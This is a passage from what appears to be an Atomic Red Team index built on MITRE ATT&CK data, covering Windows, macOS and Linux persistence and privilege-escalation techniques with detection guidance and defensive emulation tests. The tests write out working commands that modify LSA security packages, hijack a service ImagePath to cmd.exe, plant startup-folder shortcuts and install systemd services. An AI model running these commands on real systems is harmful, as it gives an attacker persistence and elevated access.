x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned SSP DLLs try to load into the LSA by - setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1547.005 - atomic_tests: - - name: Modify SSP configuration in registry - auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - description: Add a value to a Windows registry SSP key, simulating an adversarial - modification of those keys. - supported_platforms: - - windows - input_arguments: - fake_ssp_dll: - description: Value added to registry key. Normally refers to a DLL name - in C:\Windows\System32. - type: String - default: not-a-ssp - executor: - command: | - # run these in sequence - $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' - $SecurityPackagesUpdated = $SecurityPackages - $SecurityPackagesUpdated += "#{fake_ssp_dll}" - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated - - # revert (before reboot) - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages - name: powershell - elevation_required: true - T1505: - technique: - id: attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb - description: Adversaries may abuse legitimate extensible development features - of servers to establish persistent access to systems. Enterprise server applications - may include features that allow developers to write and install software or - scripts to extend the functionality of the main application. Adversaries may - install malicious components to extend and abuse server applications. - name: Server Software Component - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1505 - url: https://attack.mitre.org/techniques/T1505 - - url: https://www.us-cert.gov/ncas/alerts/TA15-314A - description: US-CERT. (2015, November 13). Compromised Web Servers and Web - Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. - source_name: US-CERT Alert TA15-314A Web Shells - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-09-16T19:34:19.961Z' - created: '2019-06-28T17:52:07.296Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_permissions_required: - - Administrator - - SYSTEM - - root - x_mitre_version: '1.1' - x_mitre_data_sources: - - Netflow/Enclave netflow - - Process monitoring - - File monitoring - - Application logs - x_mitre_detection: "Consider monitoring application logs for abnormal behavior - that may indicate suspicious installation of application software components. - Consider monitoring file locations associated with the installation of new - application software components such as paths from which applications typically - load such extensible components.\n\nProcess monitoring may be used to detect - servers components that perform suspicious actions such as running cmd.exe - or accessing files. Log authentication attempts to the server and any unusual - traffic patterns to or from the server and internal network. (Citation: US-CERT - Alert TA15-314A Web Shells) " - atomic_tests: [] - T1574.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.010 - url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-17 - source_name: capec - url: https://capec.mitre.org/data/definitions/17.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:10:04.262Z' - created: '2020-03-12T20:43:53.998Z' - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Services - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: "Look for changes to binaries and service executables that - may normally occur during software updates. If an executable is written, renamed, - and/or moved to match an existing service executable, it could be detected - and correlated with other suspicious behavior. Hashing of binaries and service - executables could be used to detect replacement against historical data.\n\nLook - for abnormal process call trees from typical processes and services and for - execution of other commands that could relate to Discovery or other adversary - techniques. " - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.011 - url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - source_name: Registry Key Security - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. - Retrieved March 16, 2017. - - source_name: Kansa Service related collectors - url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html - description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and - analysis. Retrieved October 10, 2019.' - - source_name: Tweet Registry Perms Weakness - url: https://twitter.com/r0wdy_/status/936365549553991680 - description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved - April 9, 2018." - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services Registry Permissions Weakness - description: "Adversaries may execute their own malicious payloads by hijacking - the Registry entries used by services. Adversaries may use flaws in the permissions - for registry to redirect from the originally specified executable to one that - they control, in order to launch their own code at Service start. Windows - stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. - The information stored under a service's Registry keys can be manipulated - to modify a service's execution parameters through tools such as the service - controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), - or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys - is controlled through Access Control Lists and permissions. (Citation: Registry - Key Security)\n\nIf the permissions for users and groups are not properly - set and allow access to the Registry keys for a service, then adversaries - can change the service binPath/ImagePath to point to a different executable - under their control. When the service starts or is restarted, then the adversary-controlled - program will execute, allowing the adversary to gain persistence and/or privilege - escalation to the account context the service is set to execute under (local/domain - account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also - alter Registry keys associated with service failure parameters (such as FailureCommand) - that may be executed in an elevated context anytime the service fails or is - intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: - Tweet Registry Perms Weakness) " - id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:07:48.590Z' - created: '2020-03-13T11:42:14.444Z' - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - - Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - Windows Registry - - Services - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1574.011 - atomic_tests: - - name: Service Registry Permissions Weakness - auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. - reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service check - type: String - default: weakservicename - executor: - command: | - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell - - name: Service ImagePath Change with reg.exe - auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - description: 'Change Service registry ImagePath of a bengin service to a malicious - file - -' - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service name - type: String - default: calcservice - weak_service_path: - description: weak service path - type: String - default: "%windir%\\system32\\win32calc.exe" - malicious_service_path: - description: malicious service path - type: String - default: "%windir%\\system32\\cmd.exe" - dependency_executor_name: powershell - dependencies: - - description: 'The service must exist (#{weak_service_name}) - -' - prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit - 1} - -' - get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - -' - executor: - command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" - /f /v ImagePath /d "#{malicious_service_path}" - -' - cleanup_command: 'sc.exe delete #{weak_service_name} - -' - name: command_prompt - T1547.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.009 - url: https://attack.mitre.org/techniques/T1547/009 - - external_id: CAPEC-132 - source_name: capec - url: https://capec.mitre.org/data/definitions/132.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Shortcut Modification - description: |- - Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. - - Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. - id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T17:21:27.487Z' - created: '2020-01-24T19:00:32.917Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Since a shortcut's target path likely will not change, modifications - to shortcut files that do not correlate with known software changes, patches, - removal, etc., may be suspicious. Analysis should attempt to relate shortcut - file change or creation events to other potentially suspicious events based - on known adversary behavior such as process launches of unknown executables - that make network connections. - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.009 - atomic_tests: - - name: Shortcut Modification - auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - description: | - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; - gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. - Upon execution, calc.exe will be launched. - supported_platforms: - - windows - input_arguments: - shortcut_file_path: - description: shortcut modified and execute - type: path - default: "%temp%\\T1547.009_modified_shortcut.url" - executor: - command: | - echo [InternetShortcut] > #{shortcut_file_path} - echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} - #{shortcut_file_path} - cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - -' - name: command_prompt - - name: Create shortcut to cmd in startup folders - auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - description: | - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" - to view the new shortcut. - supported_platforms: - - windows - executor: - command: | - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1037.005: - technique: - id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f - description: "Adversaries may use startup items automatically executed at boot - initialization to establish persistence. Startup items execute during the - final phase of the boot process and contain shell scripts or other executable - files along with configuration information used by the system to determine - the execution order for all startup items. (Citation: Startup Items)\n\nThis - is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), - and thus the appropriate folder, /Library/StartupItems isn’t - guaranteed to exist on the system by default, but does appear to exist by - default on macOS Sierra. A startup item is a directory whose executable and - configuration property list (plist), StartupParameters.plist, - reside in the top-level directory. \n\nAn adversary can create the appropriate - folders/files in the StartupItems directory to register their own persistence - mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since - StartupItems run during the bootup phase of macOS, they will run as the elevated - root user." - name: Startup Items - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.005 - url: https://attack.mitre.org/techniques/T1037/005 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:47:39.124Z' - created: '2020-01-15T18:00:33.603Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_detection: |- - The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. - - Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.005 - atomic_tests: - - name: Add file to Local Library StartupItems - auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - description: | - Modify or create an file in /Library/StartupItems - - [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) - supported_platforms: - - macos - executor: - command: 'sudo touch /Library/StartupItems/EvilStartup.plist - -' - cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - -' - name: sh - elevation_required: true - T1542.001: - technique: - id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada - description: |- - Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) - - System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. - name: System Firmware - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542.001 - url: https://attack.mitre.org/techniques/T1542/001 - - external_id: CAPEC-532 - source_name: capec - url: https://capec.mitre.org/data/definitions/532.html - - url: https://en.wikipedia.org/wiki/BIOS - description: Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016. - source_name: Wikipedia BIOS - - url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface - description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. - Retrieved July 11, 2017. - source_name: Wikipedia UEFI - - url: http://www.uefi.org/about - description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. - source_name: About UEFI - - url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research - description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE - Firmware Security Research. Retrieved January 5, 2016. - source_name: MITRE Trustworthy Firmware Measurement - - url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about - description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions - about BIOS Security. Retrieved December 11, 2015.' - source_name: MITRE Copernicus - - url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ - description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against - Vault 7 Disclosure Scanning. Retrieved March 13, 2017. - source_name: McAfee CHIPSEC Blog - - url: https://github.com/chipsec/chipsec - description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment - Framework. Retrieved March 20, 2017. - source_name: Github CHIPSEC - - url: http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html - description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. - Retrieved March 20, 2017. - source_name: Intel HackingTeam UEFI Rootkit - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-05-19T21:22:37.865Z' - created: '2019-12-19T19:43:34.507Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Jean-Ian Boutin, ESET - - McAfee - - Ryan Becwar - x_mitre_data_sources: - - EFI - - BIOS - - API monitoring - x_mitre_detection: |- - System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. - - Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit) - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Host intrusion prevention systems - - Anti-virus - - File monitoring - atomic_tests: [] - T1543.002: - technique: - id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b - description: "Adversaries may create or modify systemd services to repeatedly - execute malicious payloads as part of persistence. The systemd service manager - is commonly used for managing background daemon processes (also known as services) - and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: - Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization - (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, - CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit - and Upstart while remaining backwards compatible with the aforementioned init - systems.\n\nSystemd utilizes configuration files known as service units to - control how services boot and under what conditions. By default, these unit - files are stored in the /etc/systemd/system and /usr/lib/systemd/system - directories and have the file extension .service. Each service - unit file may contain numerous directives that can execute system commands:\n\n* - ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands - when a services is started manually by 'systemctl' or on system start if the - service is set to automatically start. \n* ExecReload directive covers when - a service restarts. \n* ExecStop and ExecStopPost directives cover when a - service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd - functionality to establish persistent access to victim systems by creating - and/or modifying service unit files that cause systemd to execute malicious - commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries - typically require root privileges to create/modify service unit files in the - /etc/systemd/system and /usr/lib/systemd/system - directories, low privilege users can create/modify service unit files in directories - such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: - Rapid7 Service Persistence 22JUNE2016)" - name: Systemd Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.002 - url: https://attack.mitre.org/techniques/T1543/002 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - source_name: Freedesktop.org Linux systemd 29SEP2018 - url: https://www.freedesktop.org/wiki/Software/systemd/ - description: Freedesktop.org. (2018, September 29). systemd System and Service - Manager. Retrieved April 23, 2019. - - source_name: Anomali Rocke March 2019 - url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang - description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With - a New Malware Family Written in Golang. Retrieved April 24, 2019. - - source_name: Rapid7 Service Persistence 22JUNE2016 - url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence - description: Rapid7. (2016, June 22). Service Persistence. Retrieved April - 23, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.701Z' - created: '2020-01-17T16:15:19.870Z' - x_mitre_platforms: - - Linux - x_mitre_detection: |- - Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. - - Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.2' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_contributors: - - Tony Lambert, Red Canary - identifier: T1543.002 - atomic_tests: - - name: Create Systemd Service - auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - description: 'This test creates a Systemd service unit file and enables it as - a service. - -' - supported_platforms: - - linux - input_arguments: - systemd_service_path: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system" - systemd_service_file: - description: File name of systemd service unit file - type: String - default: art-systemd-service.service - execstoppost_action: - description: ExecStopPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstoppost-marker" - execreload_action: - description: ExecReload action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execreload-marker" - execstart_action: - description: ExecStart action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstart-marker" - execstop_action: - description: ExecStop action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstop-marker" - execstartpre_action: - description: ExecStartPre action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpre-marker" - execstartpost_action: - description: ExecStartPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpost-marker" - executor: - command: | - echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} - echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} - echo "Type=simple" - echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} - echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - systemctl enable #{systemd_service_file} - systemctl start #{systemd_service_file} - cleanup_command: | - systemctl stop #{systemd_service_file} - systemctl disable #{systemd_service_file} - rm -rf #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - name: bash - T1053.006: - technique: - id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 - description: |- - Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) - - Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. - - An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. - name: Systemd Timers - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1053.006 - url: https://attack.mitre.org/techniques/T1053/006 - - source_name: archlinux Systemd Timers Aug 2020 - url: https://wiki.archlinux.org/index.php/Systemd/Timers - description: archlinux. (2020, August 11). systemd/Timers. Retrieved October - 12, 2020. - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux - AUR Package Repository. Retrieved April 23, 2019. - url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 - - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public - Arch package compromise. Retrieved April 23, 2019. - url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a - source_name: gist Arch package compromise 10JUL2018 - - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved - April 23, 2019. - url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html - source_name: acroread package compromised Arch Linux Mail 8JUL2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-14T15:20:00.754Z' - created: '2020-10-12T17:50:31.584Z' - x_mitre_platforms: - - Linux - x_mitre_contributors: - - SarathKumar Rajendran, Trimble Inc - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - 